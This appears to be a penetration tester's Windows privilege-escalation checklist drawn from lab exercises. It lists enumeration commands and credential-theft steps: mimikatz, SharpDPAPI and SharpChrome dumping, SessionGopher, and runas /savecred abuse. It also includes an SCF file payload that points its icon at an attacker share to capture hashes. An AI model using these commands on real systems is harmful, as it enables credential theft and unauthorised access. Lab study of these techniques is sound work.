📋Windows Privesc Checklist

Check for hidden files in powershell with ls -fo

Refer https://github.com/maksyche/pentest-everything/tree/master/enum_and_exploit/windows

Privileges, groups,etc

pipelist.exe /accepteula

Or in powershell:

gci \\.\pipe\
.\accesschk.exe /accepteula \pipe\

To check of a particular pipe:

accesschk.exe /accepteula \\.\Pipe\lsass -v
Get-ADObject -SearchBase "CN=Deleted Objects,DC=Cascade,DC=Local" -Filter {ObjectClass -eq "user"} -IncludeDeletedObjects -Properties *

Use mimikatz once Administrator access is gained. Multiple techniques are outlined in the Mimikatz page

SharpDPAPI

.\SharpDPAPI.exe machinecredentials

Common Vulnerabilities

Social Engineering

scf file:

```
[Shell]
Command=2
IconFile=\\10.10.14.3\share\legit.ico
[Taskbar]
Command=ToggleDesktop
```

Programs & Services

Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections

Remove "select displayname" to display all properties 32 bit:

Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname

64 bit:

Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname

Also check Program files directory and Downloads

Network

Files & Creds (PuTTY,Autologon,etc)

cmdkey /list

If stored credentials present can run commands as other users:

PS C:\htb> runas /savecred /user:inlanefreight\bob "COMMAND HERE"
.\SharpChrome.exe logins /unprotect
Import-Module .\SessionGopher.ps1
Invoke-SessionGopher -Target WINLPE-SRV01
# Locally:
Invoke-SessionGopher -Thorough

Last updated